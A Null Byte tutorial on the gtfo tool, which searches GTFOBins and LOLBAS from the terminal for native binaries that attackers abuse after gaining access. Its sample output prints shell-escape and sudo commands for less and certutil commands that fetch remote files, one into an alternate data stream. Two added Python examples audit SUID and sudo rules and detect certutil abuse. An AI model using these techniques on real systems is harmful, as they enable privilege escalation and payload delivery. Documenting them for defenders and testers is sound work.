
Using gtfo to Search for Abusable Binaries During Post-Exploitation « Null Byte :: WonderHowTo



GTFOBins and LOLBAS are projects that document native binaries which can be abused and exploited by attackers on Unix and Windows systems. These binaries are commonly used for living off the land during post-exploitation. In this tutorial, we're going to look at gtfo, a tool that lets us search both projects for abusable binaries right from the command line.

What Is Living Off the Land?

Living off the land is a technique in which attackers leverage the tools and features that already exist in the target environment to drive the attack forward. Goals include privilege escalation, lateral movement, persistence, data exfiltration, spawning reverse shells, and more.

This technique is great for flying under the radar and can be difficult for defenders to spot. Because many of these tools are used for legitimate administration, separating malicious activity from normal activity is hard. Windows PowerShell is a good example: although it has been abused by attackers for years, it remains a common post-exploitation vector.

Another compelling reason malicious actors prefer native binaries is cost. In general, developing custom tools is far more expensive and riskier, since such tools can be flagged from the start. Especially when living-off-the-land techniques will do the job, it is in an attacker's interest to use what is already there.

GTFOBins and LOLBAS are undoubtedly excellent resources when it comes to abusable native binaries. However, switching back and forth to the browser can be a chore. Gtfo is a tool written in Python that aims to provide all of the information these resources offer from the convenience of the terminal.

Install gtfo

To install gtfo we first need to clone the GitHub repository:

~# git clone https://github.com/mzfr/gtfo

Cloning into 'gtfo'...
remote: Enumerating objects: 56, done.
remote: Counting objects: 100% (56/56), done.
remote: Compressing objects: 100% (42/42), done.
remote: Total 56 (delta 21), reused 42 (delta 12), pack-reused 0
Unpacking objects: 100% (56/56), 317.52 KiB | 1.65 MiB/s, done.

Next, change to the newly created directory:

~# cd gtfo

Gtfo is written for Python 3, so we need pip3 here. It can be installed with the following command:

~/gtfo# apt install python3-pip

Now we can install the necessary dependencies:

~/gtfo# pip3 install -r requirements.txt

Requirement already satisfied: pyyaml in /usr/lib/python3/dist-packages (from -r requirements.txt (line 1)) (5.3.1)
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (2.23.0)
Collecting bs4
  Downloading bs4-0.0.1.tar.gz (1.1 kB)
Requirement already satisfied: lxml in /usr/lib/python3/dist-packages (from -r requirements.txt (line 4)) (4.5.2)
Collecting requests_cache
  Downloading requests_cache-0.5.2-py2.py3-none-any.whl (22 kB)
Requirement already satisfied: tabulate in /usr/lib/python3/dist-packages (from -r requirements.txt (line 6)) (0.8.2)
Requirement already satisfied: pyfiglet in /usr/lib/python3/dist-packages (from -r requirements.txt (line 7)) (0.8.post0)
Requirement already satisfied: beautifulsoup4 in /usr/lib/python3/dist-packages (from bs4->-r requirements.txt (line 3)) (4.9.1)
Building wheels for collected packages: bs4
  Building wheel for bs4 (setup.py) ... done
  Created wheel for bs4: filename=bs4-0.0.1-py3-none-any.whl size=1272 sha256=2a0036256cc5bc7b34622abe1b56ff080f2829a0ae7cc2c858b079e0c9172e71
  Stored in directory: /root/.cache/pip/wheels/75/78/21/68b124549c9bdc94f822c02fb9aa3578a669843f9767776bca
Successfully built bs4
Installing collected packages: bs4, requests-cache
Successfully installed bs4-0.0.1 requests-cache-0.5.2

Now we can run gtfo with the dot-slash:

~/gtfo# ./gtfo

   _  _           _    __
 _| || |_        | |  / _|
|_  __  _|   __ _| |_| |_ ___
 _| || |_   / _` | __|  _/ _ 
|_  __  _| | (_| | |_| || (_) |
  |_||_|    __, |__|_| ___/
             __/ |
            |___/

usage: gtfo [-h] (-b BINS | -e EXE | -w LINK | -ls {bins,exe})
gtfo: error: one of the arguments -b/--bins -e/--exe -w/--link -ls/--list is required

This gives us some brief usage information. To be able to run the tool from anywhere on the system, we can create a symbolic link to the executable. Navigate to /usr/local/bin to get started:

~/gtfo# cd /usr/local/bin/

And create a symbolic link called gtfo that points to the executable in the directory we cloned from GitHub earlier (~/gtfo):

/usr/local/bin# ln -s ~/gtfo/gtfo gtfo

Now we can run gtfo from any directory.

Using gtfo to Find Binaries

Use the -h flag to display the help menu and the optional arguments:

~# gtfo -h

   _  _           _    __
 _| || |_        | |  / _|
|_  __  _|   __ _| |_| |_ ___
 _| || |_   / _` | __|  _/ _ 
|_  __  _| | (_| | |_| || (_) |
  |_||_|    __, |__|_| ___/
             __/ |
            |___/

usage: gtfo [-h] (-b BINS | -e EXE | -w LINK | -ls {bins,exe})

optional arguments:
  -h, --help            show this help message and exit
  -b BINS, --bins BINS  Search binaries on GTFOBins
  -e EXE, --exe EXE     Search Windows exe on LOLBAS
  -w LINK, --link LINK  gtfobins link to the page
  -ls {bins,exe}, --list {bins,exe}
                        list all the available binaries

We can list the Unix binaries using the -ls switch followed by the bins argument:

~# gtfo -ls bins

   _  _           _    __
 _| || |_        | |  / _|
|_  __  _|   __ _| |_| |_ ___
 _| || |_   / _` | __|  _/ _ 
|_  __  _| | (_| | |_| || (_) |
  |_||_|    __, |__|_| ___/
             __/ |
            |___/

╒═════════════╤═══════════╤═══════════╤════════════╤═══════════╤══════════════╤═════════════╤══════════╤═══════════════════╤══════════╕
│ apt-get     │ apt       │ aria2c    │ arp        │ ash       │ awk          │ base32      │ base64   │ bash              │ bpftrace │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ bundler     │ busctl    │ busybox   │ byebug     │ cancel    │ cat          │ chmod       │ chown    │ chroot            │ cobc     │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ cp          │ cpan      │ cpulimit  │ crash      │ crontab   │ csh          │ curl        │ cut      │ dash              │ date     │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ dd          │ dialog    │ diff      │ dmesg      │ dmsetup   │ dnf          │ docker      │ dpkg     │ easy_install      │ eb       │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ ed          │ emacs     │ env       │ eqn        │ expand    │ expect       │ facter      │ file     │ find              │ finger   │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ flock       │ fmt       │ fold      │ ftp        │ gawk      │ gcc          │ gdb         │ gem      │ genisoimage       │ gimp     │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ git         │ grep      │ gtester   │ hd         │ head      │ hexdump      │ highlight   │ iconv    │ iftop             │ ionice   │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ ip          │ irb       │ jjs       │ journalctl │ jq        │ jrunscript   │ ksh         │ ksshell  │ ld.so             │ ldconfig │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ less        │ logsave   │ look      │ ltrace     │ lua       │ lwp-download │ lwp-request │ mail     │ make              │ man      │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ mawk        │ more      │ mount     │ mtr        │ mv        │ mysql        │ nano        │ nawk     │ nc                │ nice     │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ nl          │ nmap      │ node      │ nohup      │ nroff     │ nsenter      │ od          │ openssl  │ pdb               │ perl     │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ pg          │ php       │ pic       │ pico       │ pip       │ pkexec       │ pry         │ puppet   │ python            │ rake     │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ readelf     │ red       │ redcarpet │ restic     │ rlogin    │ rlwrap       │ rpm         │ rpmquery │ rsync             │ ruby     │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ run-mailcap │ run-parts │ rview     │ rvim       │ scp       │ screen       │ script      │ sed      │ service           │ setarch  │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ sftp        │ shuf      │ smbclient │ socat      │ soelim    │ sort         │ sqlite3     │ ssh      │ start-stop-daemon │ stdbuf   │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ strace      │ strings   │ su        │ sysctl     │ systemctl │ tac          │ tail        │ tar      │ taskset           │ tclsh    │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ tcpdump     │ tee       │ telnet    │ tftp       │ time      │ timeout      │ tmux        │ top      │ ul                │ unexpand │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ uniq        │ unshare   │ uudecode  │ uuencode   │ valgrind  │ vi           │ view        │ vim      │ watch             │ wget     │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ whois       │ wish      │ xargs     │ xxd        │ xz        │ yelp         │ yum         │ zip      │ zsh               │ zsoelim  │
├─────────────┼───────────┼───────────┼────────────┼───────────┼──────────────┼─────────────┼──────────┼───────────────────┼──────────┤
│ zypper      │           │           │            │           │              │             │          │                   │          │
╘═════════════╧═══════════╧═══════════╧════════════╧═══════════╧══════════════╧═════════════╧══════════╧═══════════════════╧══════════╛

This outputs a nice table containing all of the abusable binaries documented on GTFOBins.

To list the Windows binaries, use the -ls switch followed by the exe argument:

~# gtfo -ls exe

   _  _           _    __
 _| || |_        | |  / _|
|_  __  _|   __ _| |_| |_ ___
 _| || |_   / _` | __|  _/ _ 
|_  __  _| | (_| | |_| || (_) |
  |_||_|    __, |__|_| ___/
             __/ |
            |___/

╒═══════════════════╤══════════════════════╤═════════════════════════════════╤══════════════════════════════╤═══════════════════════╤════════════════════════╤══════════════════════════════╕
│ At.exe            │ Atbroker.exe         │ Bash.exe                        │ Bitsadmin.exe                │ CertReq.exe           │ Certutil.exe           │ Cmd.exe                      │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Cmdkey.exe        │ Cmstp.exe            │ Control.exe                     │ Csc.exe                      │ Cscript.exe           │ Desktopimgdownldr.exe  │ Dfsvc.exe                    │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Diantz.exe        │ Diskshadow.exe       │ Dnscmd.exe                      │ Esentutl.exe                 │ Eventvwr.exe          │ Expand.exe             │                              │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Extexport.exe     │ Extrac32.exe         │ Findstr.exe                     │ Forfiles.exe                 │ Ftp.exe               │ GfxDownloadWrapper.exe │ Gpscript.exe                 │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Hh.exe            │ Ie4uinit.exe         │ Ieexec.exe                      │ Ilasm.exe                    │ Infdefaultinstall.exe │ Installutil.exe        │ Jsc.exe                      │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Makecab.exe       │ Mavinject.exe        │ Microsoft.Workflow.Compiler.exe │ Mmc.exe                      │ MpCmdRun.exe          │ Msbuild.exe            │ Msconfig.exe                 │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Msdt.exe          │ Mshta.exe            │ Msiexec.exe                     │ Netsh.exe                    │ Odbcconf.exe          │ Pcalua.exe             │ Pcwrun.exe                   │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Pktmon.exe        │ Presentationhost.exe │ Print.exe                       │ Psr.exe                      │ Rasautou.exe          │ Reg.exe                │ Regasm.exe                   │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Regedit.exe       │ Regini.exe           │ Register-cimprovider.exe        │ Regsvcs.exe                  │ Regsvr32.exe          │ Replace.exe            │ Rpcping.exe                  │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Rundll32.exe      │ Runonce.exe          │ Runscripthelper.exe             │ Sc.exe                       │ Schtasks.exe          │ Scriptrunner.exe       │ SyncAppvPublishingServer.exe │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Ttdinject.exe     │ Tttracer.exe         │ vbc.exe                         │ Verclsid.exe                 │ Wab.exe               │ Wmic.exe               │ Wscript.exe                  │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Wsreset.exe       │ Xwizard.exe          │ Advpack.dll                     │ Comsvcs.dll                  │ Ieadvpack.dll         │ Ieaframe.dll           │ Mshtml.dll                   │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Pcwutl.dll        │ Setupapi.dll         │ Shdocvw.dll                     │ Shell32.dll                  │ Syssetup.dll          │ Url.dll                │ Zipfldr.dll                  │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ AgentExecutor.exe │ Appvlp.exe           │ Bginfo.exe                      │ Cdb.exe                      │ csi.exe               │ Devtoolslauncher.exe   │ dnx.exe                      │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Dotnet.exe        │ Dxcap.exe            │ Excel.exe                       │ Mftrace.exe                  │ Msdeploy.exe          │ msxsl.exe              │ ntdsutil.exe                 │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Powerpnt.exe      │ rcsi.exe             │ Sqldumper.exe                   │ Sqlps.exe                    │ SQLToolsPS.exe        │ Squirrel.exe           │ te.exe                       │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Tracker.exe       │ Update.exe           │ vsjitdebugger.exe               │ Winword.exe                  │ Wsl.exe               │ CL_Mutexverifiers.ps1  │ CL_Invocation.ps1            │
├───────────────────┼──────────────────────┼─────────────────────────────────┼──────────────────────────────┼───────────────────────┼────────────────────────┼──────────────────────────────┤
│ Manage-bde.wsf    │ Pubprn.vbs           │ Slmgr.vbs                       │ Syncappvpublishingserver.vbs │ winrm.vbs             │ Pester.bat             │                              │
╘═══════════════════╧══════════════════════╧═════════════════════════════════╧══════════════════════════════╧═══════════════════════╧════════════════════════╧══════════════════════════════╛

This outputs a table containing all of the abusable binaries documented on LOLBAS.

Use the -b flag to get information about a specific binary. Here we see the information for the Unix less command:

~# gtfo -b less

   _  _           _    __
 _| || |_        | |  / _|
|_  __  _|   __ _| |_| |_ ___
 _| || |_   / _` | __|  _/ _ 
|_  __  _| | (_| | |_| || (_) |
  |_||_|    __, |__|_| ___/
             __/ |
            |___/

Code:   less /etc/profile
        !/bin/sh

Type:   shell

Code:   VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
        v

Type:   shell

Code:   less file_to_read
Type:   file-read

# This is useful when `less` is used as a pager by another binary to read a different file.
Code:   less /etc/profile
        :e file_to_read

Type:   file-read

Code:   echo DATA | less
        sfile_to_write
        q

Type:   file-write

# This invokes the default editor to edit the file. The file must exist.
Code:   less file_to_write
        v

Type:   file-write

Code:   sudo less /etc/profile
        !/bin/sh

Type:   sudo

Code:   ./less file_to_read
Type:   suid

In the output we see the type of abuse and the corresponding code. This example includes code for sudo and SUID to get a shell, as well as for reading and writing files.
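As an added example (not part of the tutorial or the gtfo project), the following Python script turns the Type column above into a defender's hardening check: it cross-references the binaries that are SUID or sudo-allowed on a host with a GTFOBins-style catalogue and reports the ones whose catalogue entry carries the same vector. The catalogue, the find -perm -4000 listing and the sudo -l output are all constructed inline for the example; the less entry mirrors the types shown above, and the other catalogue entries are sample data rather than a claim about GTFOBins' contents.

```python
"""Audit SUID binaries and sudo rules against a GTFOBins-style catalogue.

Added example (not part of the tutorial or the gtfo project): a defender's
hardening check that asks "which binaries that are SUID or sudo-allowed on
this host have a 'suid' or 'sudo' entry in the catalogue?"  Everything below
runs offline on constructed input.
"""
import os
import re

# Constructed catalogue: binary name -> set of GTFOBins "Type" values.
# The `less` entry mirrors the types shown by `gtfo -b less`; the other
# entries are sample data for this example, not a claim about GTFOBins' contents.
CATALOGUE = {
    "less": {"shell", "file-read", "file-write", "sudo", "suid"},
    "find": {"shell", "sudo", "suid"},
    "cat": {"file-read", "sudo", "suid"},
    "vim": {"shell", "file-read", "file-write", "sudo", "suid"},
}

# Constructed output of:  find / -perm -4000 -type f 2>/dev/null
SUID_LISTING = """\
/usr/bin/ping
/usr/bin/find
/usr/bin/passwd
/usr/local/bin/less
"""

# Constructed output of:  sudo -l   (run as the user being audited)
SUDO_L_OUTPUT = """\
Matching Defaults entries for alice on host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on host:
    (ALL) NOPASSWD: /usr/bin/vim, /usr/bin/cat
    (root) /usr/sbin/service apache2 restart
"""

# A sudoers rule line looks like: "(runas) [TAG: ...] command [args], command [args]"
RULE_RE = re.compile(r"^\s*\([^)]*\)\s*(?P<body>.+)$")
TAG_RE = re.compile(
    r"^(?:NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|NOLOG_INPUT|"
    r"LOG_OUTPUT|NOLOG_OUTPUT|MAIL|NOMAIL|FOLLOW|NOFOLLOW):\s*"
)


def parse_suid_listing(text):
    """Return the absolute paths from a `find -perm -4000` listing, in order."""
    return [line.strip() for line in text.splitlines() if line.strip().startswith("/")]


def parse_sudo_rules(text):
    """Return the command paths a user may run according to `sudo -l` output.

    Only lines after the "may run the following commands" header are rules;
    each rule may list several comma-separated commands, each optionally
    prefixed by tags such as NOPASSWD: and followed by arguments.
    """
    commands = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        match = RULE_RE.match(line) if in_rules else None
        if not match:
            continue
        for spec in match.group("body").split(","):
            spec = spec.strip()
            while True:  # strip any number of leading tags
                stripped = TAG_RE.sub("", spec, count=1)
                if stripped == spec:
                    break
                spec = stripped
            if spec:
                commands.append(spec.split()[0])  # drop arguments, keep the path
    return commands


def audit(suid_paths, sudo_paths, catalogue):
    """Cross-reference host findings with the catalogue.

    A binary is reported when the catalogue lists the same vector ('suid' or
    'sudo') that the host grants it. A bare ALL sudo rule is reported as-is,
    since it covers every catalogued binary at once.
    """
    findings = []
    for vector, paths in (("suid", suid_paths), ("sudo", sudo_paths)):
        for path in paths:
            if path == "ALL":
                findings.append({"path": "ALL", "vector": vector, "types": ["ALL"]})
                continue
            types = catalogue.get(os.path.basename(path), set())
            if vector in types:
                findings.append({"path": path, "vector": vector, "types": sorted(types)})
    return findings


def format_report(findings):
    """Render findings as one line each, e.g. for a ticket or a CI job."""
    if not findings:
        return "no catalogued binaries are SUID or sudo-allowed"
    return "\n".join(
        f"{f['vector']:<4} {f['path']:<24} catalogue types: {', '.join(f['types'])}"
        for f in findings
    )


if __name__ == "__main__":
    report = format_report(audit(parse_suid_listing(SUID_LISTING),
                                 parse_sudo_rules(SUDO_L_OUTPUT), CATALOGUE))
    print(report)
```

In practice you would feed the script the real output of both commands and a catalogue built from the GTFOBins data; every finding is a candidate for dropping the SUID bit or tightening the sudoers rule, and the report is short enough to run from a configuration-audit job. Note that passwd and ping are SUID in the sample listing but are not reported, because the catalogue has no entry for them.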

We can also get the link to the GTFOBins page with the -w option:

~# gtfo -w less

   _  _           _    __
 _| || |_        | |  / _|
|_  __  _|   __ _| |_| |_ ___
 _| || |_   / _` | __|  _/ _ 
|_  __  _| | (_| | |_| || (_) |
  |_||_|    __, |__|_| ___/
             __/ |
            |___/

--> less        -------------------->    https://gtfobins.github.io//gtfobins/less

Use the -e flag to view information about a specific Windows binary. Note that the name is case-sensitive and the extension is required. Here we see the information for the Certutil.exe program:

~# gtfo -e Certutil.exe

   _  _           _    __
 _| || |_        | |  / _|
|_  __  _|   __ _| |_| |_ ___
 _| || |_   / _` | __|  _/ _ 
|_  __  _| | (_| | |_| || (_) |
  |_||_|    __, |__|_| ___/
             __/ |
            |___/

# Download and save 7zip to disk in the current folder.

CMD:            certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Category:       Download
Privileges:     User

# Download and save 7zip to disk in the current folder.

CMD:            certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Category:       Download
Privileges:     User

# Download and save a PS1 file to an Alternate Data Stream (ADS).

CMD:            certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:temp:ttt
Category:       ADS
Privileges:     User

# Command to encode a file using Base64

CMD:            certutil -encode inputFileName encodedOutputFileName
Category:       Encode
Privileges:     User

# Command to decode a Base64 encoded file.

CMD:            certutil -decode encodedInputFileName decodedOutputFileName
Category:       Decode
Privileges:     User

We can see the category, command, and required privileges in the output. This example includes commands for encoding, decoding, and downloading files.
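As an added example of the defensive side (not from the tutorial, the gtfo tool, or the LOLBAS project), here is Python detection logic that classifies certutil process-creation events into the categories shown above (Download, ADS, Encode, Decode). The JSON-lines events, host names, user names and URLs are constructed for the example; the classification rules follow the command-line shapes printed above.

```python
"""Classify certutil.exe process-creation events by LOLBAS category.

Added example (not part of the tutorial or the LOLBAS/gtfo projects): simple
detection logic that maps a certutil command line onto the categories shown
by `gtfo -e Certutil.exe` (Download, ADS, Encode, Decode). Runs offline on
constructed JSON-lines events.
"""
import json
import re

# Constructed process-creation events (JSON lines). Hosts, users, URLs and
# file names are invented; example.invalid is a reserved, non-resolving name.
SAMPLE_EVENTS = r"""
{"ts": "2020-10-01T10:02:11Z", "host": "WS01", "user": "CORP\\alice", "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/tool.exe tool.exe"}
{"ts": "2020-10-01T10:02:40Z", "host": "WS01", "user": "CORP\\alice", "cmdline": "certutil.exe -verifyctl -f -split http://example.invalid/tool.exe tool.exe"}
{"ts": "2020-10-01T10:03:05Z", "host": "WS02", "user": "CORP\\bob", "cmdline": "certutil.exe /urlcache /split /f https://example.invalid/s.ps1 c:\\temp:stream"}
{"ts": "2020-10-01T10:04:19Z", "host": "WS02", "user": "CORP\\bob", "cmdline": "certutil -encode report.docx report.txt"}
{"ts": "2020-10-01T10:04:31Z", "host": "WS02", "user": "CORP\\bob", "cmdline": "certutil -decode report.txt report.exe"}
{"ts": "2020-10-01T10:05:00Z", "host": "WS03", "user": "CORP\\svc_it", "cmdline": "certutil -hashfile C:\\Windows\\notepad.exe SHA256"}
{"ts": "2020-10-01T10:05:12Z", "host": "WS03", "user": "CORP\\svc_it", "cmdline": "cmd.exe /c dir C:\\Users"}
"""

# A path with a named NTFS stream: <drive>:<path>:<stream>
ADS_RE = re.compile(r"^[a-z]:[^:\s]*:[^:\s]+$", re.IGNORECASE)


def parse_events(text):
    """Parse JSON-lines text into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def classify(cmdline):
    """Return the LOLBAS category for a certutil command line, or None.

    certutil accepts both -flag and /flag, so both prefixes are normalised.
    A download whose destination is an alternate data stream is reported as
    'ADS', mirroring the separate ADS entry on the LOLBAS page; other
    certutil usage (e.g. -hashfile) is left unclassified.
    """
    tokens = cmdline.split()
    if not tokens:
        return None
    image = tokens[0].lower().rsplit("\\", 1)[-1]  # strip any directory prefix
    if image not in ("certutil", "certutil.exe"):
        return None
    flags = {t.lstrip("-/").lower() for t in tokens[1:] if t[0] in "-/"}
    if "urlcache" in flags or "verifyctl" in flags:
        if any(ADS_RE.match(t) for t in tokens[1:]):
            return "ADS"
        return "Download"
    if "encode" in flags:
        return "Encode"
    if "decode" in flags:
        return "Decode"
    return None


def scan(text):
    """Return (ts, host, user, category, cmdline) for every event that matches."""
    hits = []
    for event in parse_events(text):
        category = classify(event.get("cmdline", ""))
        if category:
            hits.append((event["ts"], event["host"], event["user"], category, event["cmdline"]))
    return hits


if __name__ == "__main__":
    for ts, host, user, category, cmdline in scan(SAMPLE_EVENTS):
        print(f"{ts} {host:<5} {user:<12} {category:<9} {cmdline}")
```

The point of the category label is triage: a Download or ADS hit from a workstation user deserves a look, while Encode and Decode hits are often legitimate certificate handling, so pairing the category with the user and host (as the report does) is what makes the alert actionable rather than noisy.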

We can also get the link to the LOLBAS page with the -w option:

~# gtfo -w Certutil.exe

   _  _           _    __
 _| || |_        | |  / _|
|_  __  _|   __ _| |_| |_ ___
 _| || |_   / _` | __|  _/ _ 
|_  __  _| | (_| | |_| || (_) |
  |_||_|    __, |__|_| ___/
             __/ |
            |___/

--> Certutil.exe        -------------------->    https://lolbas-project.github.io//lolbas/Binaries/Certutil

Wrap Up

In this tutorial, we learned about the GTFOBins and LOLBAS projects and how useful they are for learning about abusable native binaries on Unix and Windows systems. We also explored gtfo, a tool that searches these resources directly from the command line. As you can see, gtfo is very handy for looking up abusable binaries without ever leaving the terminal.


Cover image from ThisIsEngineering / Pexels
